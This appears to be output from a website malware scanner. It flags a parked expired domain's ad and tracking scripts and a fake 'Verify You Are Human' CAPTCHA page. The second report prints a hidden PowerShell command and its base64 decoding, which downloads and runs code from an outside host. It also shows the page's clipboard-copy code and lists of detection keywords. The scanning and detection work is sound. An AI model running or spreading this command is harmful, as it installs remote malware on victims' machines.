"https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd*/!autoThread2?pzuiactionzzz=CXtycX03MzYwYWU1Njk5NTk3MWFhMzJjYTZlMjc2YzVhYjllNTE0YTJiMzcwM2NmMDc0YTQwZDdlNTYyNDhjZmJmNzA4ODA2NWIwMjgwZjA2OTFmMGNiMTk0NzFhNjE5ZWUzMTMxYzUwZDI0Y2Q2ZDdhZTlmMzVkMjIyMjEzZGQ1MGE4MzJmZDYyMzRiZWUwYWY5ZTRiNmYwMTY2YjliMWVlN2JhMjYyODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRiYzE%3D*",
"https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf",
"https://www.networksolutions.com/",
"https://rnatrk.com",
"http://jintsume.net/?ts=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ&skrghlp=sFZdIKBq2jpfWV3qpTGu53S%2B2%2FHTUXubDO0HgmfYnnAGbSoj8aMhwLW0OmiqLlQb",
"https://rnatrk.com/munin/a/tr/click"
],
"SuspiciousKeywords": [
"<script>",
"display:none",
"Array.prototype",
"window.location.replace"
],
"PowerShellDownloads": {
"FullMatch": ".send()",
"Context": "...' + 's?t=6809a40d&token=' + encodeURI(token), true); xhr.send(); }; ls(new XMLHttpRequest(), scriptPath, 'c8294e00fbb336010..."
},
"CaptchaElements": [
"<div id=\"tc\"></div>",
";let blurredTerms = document.getElementById('blurred-terms');if (blurredTerms !",
"7883959});</script> <script> function getLoa",
"} </script> <script> loadFeed(..",
"} .onDesktop { display:none; } .tcHolder {"
],
"HTML": "<!DOCTYPE html>\n<html data-adblockkey=\"MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_sFucTGU8IEKW6Wj40/ciWEvaKynV872P4miWJOZlDJiJIOVqOM70LEwRrbX0ChHFunX1VNCijHH6mmwxn30qXw==\" xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"en\">\n<head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"/>\n <title>jintsume.net</title>\n <style media=\"screen\">\n.asset_star0 {\n\tbackground: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;\n\twidth: 13px;\n\theight: 12px;\n\tdisplay: inline-block;\n}\n\n.asset_star1 {\n\tbackground: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star1.gif') no-repeat center;\n\twidth: 13px;\n\theight: 12px;\n\tdisplay: inline-block;\n}\n\n.asset_starH {\n\tbackground: url('//d38psrni17bvxu.cloudfront.net/themes/assets/starH.gif') no-repeat center;\n\twidth: 13px;\n\theight: 12px;\n\tdisplay: inline-block;\n}\n\n.sitelink {\n\tpadding-right: 16px;\n}\n\n.sellerRatings a:link,\n.sellerRatings a:visited,\n.sellerRatings a:hover,\n.sellerRatings a:active {\n\ttext-decoration: none;\n\tcursor: text;\n}\n\n.sellerRatings {\n\tmargin:0 0 3px 20px;\n}\n\n.sitelinkHolder {\n\tmargin:-15px 0 15px 35px;\n}\n\n#ajaxloaderHolder {\n\tdisplay: block;\n\twidth: 24px;\n\theight: 24px;\n\tbackground: #fff;\n\tpadding: 8px 0 0 8px;\n\tmargin:10px auto;\n\t-webkit-border-radius: 4px;\n\t-moz-border-radius: 4px;\n\tborder-radius: 4px;\n}</style> <style media=\"screen\">\n* {\n margin:0;padding:0\n}\n\nbody {\n background:#101c36;\n font-family: sans-serif;\n text-align: center;\n font-size:1rem;\n}\n\n.header {\n padding:1rem 1rem 0;\n overflow:hidden;\n}\n\nh1 {\n color:#848484;\n font-size:1.5rem;\n}\n\n.header-text-color:visited,\n.header-text-color:link,\n.header-text-color {\n color:#848484;\n}\n\n.comp-is-parked {\n margin: 4px 0 2px;\n}\n\n.comp-sponsored {\n text-align: left;\n margin: 0 0 -1.8rem 4px;\n}\n\n.wrapper1 {\n margin:1rem;\n}\n\n.wrapper2 {\n background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/bottom.png') no-repeat center bottom;\n padding-bottom:140px;\n}\n\n.wrapper3 {\n background:#fff;\n max-width:300px;\n margin:0 auto 1rem;\n padding-top:1px;\n padding-bottom:1px;\n}\n\n.onDesktop {\n display:none;\n}\n\n.tcHolder {\n padding-top: 2rem;\n}\n\n.adsHolder {\n margin: 1rem 0;\n padding-top: 2rem;\n overflow:hidden;\n}\n\n.footer {\n color:#626574;\n padding:2rem 1rem;\n font-size:.8rem;\n margin:0 auto;\n max-width:440px;\n}\n\n.footer a:link,\n.footer a:visited {\n color:#626574;\n}\n\n.sale_link_bold a,\n.sale_link,\n.sale_link a {\n color:#626574 !important;\n}\n\n.searchHolder {\n padding:1px 0 1px 1px;\n margin:1rem auto;\n width: 95%;\n max-width: 500px;\n}\n\n@media screen and (min-width:600px) {\n\n .comp-is-parked,\n .comp-sponsored {\n color: #848484;\n }\n\n .comp-sponsored {\n margin-left: 0;\n }\n\n .wrapper1 {\n max-width:1500px;\n margin-left:auto;\n margin-right:auto;\n }\n\n .wrapper2 {\n background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/arrows.png') no-repeat center top;\n padding-bottom:0;\n min-height:600px;\n }\n\n .wrapper3 {\n max-width:530px;\n background:none;\n }\n}\n</style> <style media=\"screen\">\n.fallback-term-holder {\n display: inline-grid;\n grid-template-columns: 1fr;\n width: 100%;\n padding-top: 50px;\n}\n\n.fallback-term-link {\n grid-column: 1 / span 1; align-self: center;\n padding: 50px 13px 50px 13px; border-radius: 25px;\n border: 5px solid #ffffff; margin-bottom: 20px;\n background-color: rgb(17, 38, 77);\n text-decoration-line: none;\n font-size: 18px;\n font-weight: 700;\n color: #ffffff;\n text-align: left;\n}\n\n.fallback-arrow {\n float: right;\n width: 24px;\n height: 24px;\n background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');\n}</style>\n \n </head>\n\n<body id=\"afd\">\n\n<div class=\"wrapper1\">\n <div class=\"wrapper2\">\n <div class=\"wrapper3\">\n \n<div style=\"padding-bottom: .5em; padding-top: .5em; border-radius: .125em; grid-template-columns: 1fr 1fr; display: inline-grid\">\n <div style=\"grid-column: 1 / span 1; align-self: center; justify-self: start\">\n <h1>jintsume.net</h1>\n </div>\n <div style=\"grid-column: 2 / span 1; align-self: center; justify-self: end\">\n <img src=\"/__media__/pics/10667/netsol-logos-2020-165-50.jpg\" height=\"50\" alt=\"Network Solutions\">\n </div>\n <div style=\"grid-column: 1 / span 2; align-self: end\">\n <span class=\"header-text-color\">jintsume.net expired on and is pending renewal or deletion.</span>\n </div>\n <div style=\"grid-column: 1 / span 2; justify-self: end\">\n <a target=\"_blank\" href=\"//ads.networksolutions.com/landing?code=P47C100S1N0B9A1D124E0000V100\" class=\"header-text-color\">\n Renew Your Domain Now\n </a>\n </div>\n <div style=\"grid-column: 1 / span 2; justify-self: end\">\n <a target=\"_blank\" href=\"https://www.networksolutions.com/promotions/ref/REPOINT-DPRD.html?dom=jintsume.net\" class=\"header-text-color\">\n Backorder Domain\n </a>\n </div>\n</div>\n <div class=\"tcHolder\">\n <div id=\"tc\"></div>\n </div>\n </div>\n </div>\n <div class=\"footer\">\n <a href=\"//jintsume.net/__media__/js/trademark.php?d=jintsume.net&type=ns\">Trademark Free</a>\n<br><br>\n<a href=\"https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd*/!autoThread2?pzuiactionzzz=CXtycX03MzYwYWU1Njk5NTk3MWFhMzJjYTZlMjc2YzVhYjllNTE0YTJiMzcwM2NmMDc0YTQwZDdlNTYyNDhjZmJmNzA4ODA2NWIwMjgwZjA2OTFmMGNiMTk0NzFhNjE5ZWUzMTMxYzUwZDI0Y2Q2ZDdhZTlmMzVkMjIyMjEzZGQ1MGE4MzJmZDYyMzRiZWUwYWY5ZTRiNmYwMTY2YjliMWVlN2JhMjYyODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRiYzE%3D*\">Review our Privacy Policy</a>\n<br><br>\n<a href=\"https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf\">Service Agreement</a>\n<br><br>\n<a href=\"https://www.networksolutions.com/\">Legal Notice</a>\n<br/><br/>\n </div>\n</div>\n\n<script type=\"text/javascript\" language=\"JavaScript\">\n var tcblock = {\n // Required and steady\n 'container': 'tc',\n 'type': 'relatedsearch',\n 'colorBackground': 'transparent',\n \n 'number': 3,\n \n // Font-Sizes and Line-Heights\n 'fontSizeAttribution': 14,\n 'fontSizeTitle': 24,\n 'lineHeightTitle': 34,\n // Colors\n 'colorAttribution': '#aaa',\n 'colorTitleLink': '#0277bd',\n // Alphabetically\n 'horizontalAlignment': 'center',\n 'noTitleUnderline': false,\n 'rolloverLinkColor': '#01579b',\n 'verticalSpacing': 10\n };\n var searchboxBlock = {\n 'container': 'search',\n 'type': 'searchbox',\n 'fontSizeSearchInput': 12,\n 'hideSearchInputBorder': false,\n 'hideSearchButtonBorder': true,\n 'fontSizeSearchButton': 13,\n 'colorBackground': 'transparent',\n 'colorSearchButton': '#0b3279',\n 'colorSearchButtonText': '#fff'\n };\n </script>\n<script type=\"text/javascript\">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMzNw=='; let search=''; let themedata='eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ'; let domain='jintsume.net'; let scriptPath='https://rnatrk.com'; let adtest='off';if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') + '_xafvr=ZGU3NDM5ZGMxNmJhNzcwNjA5MDIzYWY3OTk3MWM2YzkxNzRkOTEzYSw2ODA5YTQwZGJiYTQx'; }let pageLoadedCallbackTriggered = false;let fallbackTriggered = false;let formerCalledArguments = false;let pageOptions = {'pubId': 'dp-teaminternet01','resultsPageBaseUrl': '//' + location.host + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/munin/a/tr/click?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {containerName: containerName,adsLoaded: adsLoaded,isExperimentVariant: isExperimentVariant,callbackOptions: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + \"/munin/a/tr/adloaded\"+ \"?toggle=adloaded\"+ \"&uid=\" + encodeURIComponent(uniqueTrackingID)+ \"&domain=\" + encodeURIComponent(domain)+ \"&data=\" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': function (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true || status.faillisted == \"true\" || status.blocked === true || status.blocked == \"true\" ) && status.error_code != 25) {ajaxQuery(scriptPath + \"/munin/a/tr/block?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=block&reason=other&uid=\" + encodeURIComponent(uniqueTrackingID));}if (status.errorcode && !status.error_code) {status.error_code = status.errorcode;}if (status.error_code) {ajaxQuery(scriptPath + \"/munin/a/tr/errorcode?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=errorcode&code=\" + encodeURIComponent(status.error_code) + \"&uid=\" + encodeURIComponent(uniqueTrackingID));if ([18, 19].indexOf(parseInt(status.error_code)) != -1 && fallbackTriggered == false) {fallbackTriggered = true;if (typeof loadFeed === \"function\") {window.location.href = '//' + location.host;}}if (status.error_code == 20) {window.location.replace(\"//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=\" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? \"\" : \"ca-\") + pageOptions.pubid) + \"&domain_name=\" + encodeURIComponent(domain) + \"&output=html&drid=\" + encodeURIComponent(pageOptions.domainRegistrant));}}if (status.needsreview === true || status.needsreview == \"true\") {ajaxQuery(scriptPath + \"/munin/a/tr/needsreview?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=needsreview&uid=\" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true || status.adult == \"true\") && !isAdult) {ajaxQuery(scriptPath + \"/munin/a/tr/adult?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=adult&uid=\" + encodeURIComponent(uniqueTrackingID));} else if ((status.adult === false || status.adult == \"false\") && isAdult) {ajaxQuery(scriptPath + \"/munin/a/tr/nonadult?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=nonadult&uid=\" + encodeURIComponent(uniqueTrackingID));}if (requestAccepted) {if (status.feed) {ajaxQuery(scriptPath + \"/munin/a/tr/feed?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=feed&feed=\" + encodeURIComponent(status.feed) + \"&uid=\" + encodeURIComponent(uniqueTrackingID));}if (status.error_code) {ajaxQuery(scriptPath + \"/munin/a/tr/answercheck/error?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=answercheck&answer=error_\" + encodeURIComponent(status.error_code) + \"&uid=\" + encodeURIComponent(uniqueTrackingID));} else {ajaxQuery(scriptPath + \"/munin/a/tr/answercheck/yes?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=answercheck&answer=yes&uid=\" + encodeURIComponent(uniqueTrackingID));}} else {ajaxQuery(scriptPath + \"/munin/a/tr/answercheck/reject?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=answercheck&answer=rejected&uid=\" + encodeURIComponent(uniqueTrackingID));}}};let x = function (obj1, obj2) {if (typeof obj1 != \"object\")obj1 = {};for (let key in obj2)obj1[key] = obj2[key];return obj1;};function getXMLhttp() {let xmlHttp = null;try {xmlHttp = new XMLHttpRequest();} catch (e) {try {xmlHttp = new ActiveXObject(\"Msxml2.XMLHTTP\");} catch (ex) {try {xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");} catch (exc) {}}}return xmlHttp;}function ajaxQuery(url) {if (adtest == 'on') return false;xmlHttp = getXMLhttp();if (!xmlHttp) return ajaxBackfill(url);xmlHttp.open(\"GET\", url, false);return xmlHttp.send(null);}function ajaxBackfill(url) {if (adtest == 'on') return false;if (url.indexOf(\"&toggle=browserjs\") > -1) return false;try {let img = document.createElement('img');img.style.visibility = 'hidden';img.style.width = '1px';img.style.height = '1px';img.src = url + \"&_t=\" + new Date().getTime();document.body.appendChild(img);} catch (e) {}}ajaxQuery(scriptPath + \"/munin/a/tr/browserjs?domain=\" + encodeURIComponent(domain) + \"&toggle=browserjs&uid=\" + encodeURIComponent(uniqueTrackingID));x(pageOptions, {resultsPageBaseUrl: 'http://jintsume.net/?ts=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ&skrghlp=sFZdIKBq2jpfWV3qpTGu53S%2B2%2FHTUXubDO0HgmfYnnAGbSoj8aMhwLW0OmiqLlQb',hl: 'en',kw: '',terms: '',uiOptimize: true, channel: 'bucket007,bucket102', pubId: 'dp-teaminternet09_3ph',adtest: 'off',personalizedAds: false,clicktrackUrl: 'https://rnatrk.com/munin/a/tr/click' + '?click=caf' + '&domain=jintsume.net&uid=MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMzNw%3D%3D&ts=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ&adtest=off' });x(pageOptions, [] );x(pageOptions, { domainRegistrant:'as-drid-2513120286930328' } );function loadFeed() {let s = document.createElement('script');let blurredTerms = document.getElementById('blurred-terms');if (blurredTerms !== null) {blurredTerms.style.display = \"none\";}s.src = '//www.google.com/adsense/domains/caf.js?abp=1&adsdeli=true';document.body.appendChild(s);let a = Array.prototype.slice.call(arguments);s.onload = function () {let c = google.ads.domains.Caf;switch (a.length) {case 1:return new c(a[0]);case 2:return new c(a[0], a[1]);case 3:return new c(a[0], a[1], a[2]);case 4:return new c(a[0], a[1], a[2], a[3]);case 5:return new c(a[0], a[1], a[2], a[3], a[4]);}return c.apply(null, a);};}</script>\n<script type=\"text/javascript\">var ls = function(xhr, path, token) {\n xhr.onreadystatechange = function () {\n if (xhr.readyState === XMLHttpRequest.DONE) {\n if (xhr.status >= 200 && xhr.status <= 400) {\n if (xhr.responseText.trim() === '') {\n return;\n }\n \n console.log(JSON.parse(xhr.responseText))\n } else {\n console.log('There was a problem with the request.');\n }\n }\n }\n \n xhr.open('GET', path + '/munin/a/l' + 's?t=6809a40d&token=' + encodeURI(token), true);\n xhr.send();\n};\nls(new XMLHttpRequest(), scriptPath, 'c8294e00fbb336010e22617fdc174028d1a4ba2b');</script>\n<script type='text/javascript'>x(pageOptions, { \"styleId\":5837883959});</script>\n<script>\n function getLoadFeedArguments() {\n let arguments = [\n pageOptions\n ];\n\n let possibleArguments = ['adblock', 'adblock1', 'adblock2', 'tcblock', 'searchboxBlock', 'rtblock', 'rsblock', 'searchblock'];\n for (let i = 0; i < possibleArguments.length; i++) {\n if (typeof this[possibleArguments[i]] !== 'undefined') {\n arguments.push(this[possibleArguments[i]]);\n }\n }\n\n return arguments;\n }\n</script>\n\n <script>\n loadFeed(...getLoadFeedArguments());\n </script>\n</body>\n</html>\n",
"ThreatLevel": "High"
}
https://horno-rafelet.es/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://horno-rafelet.es/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo 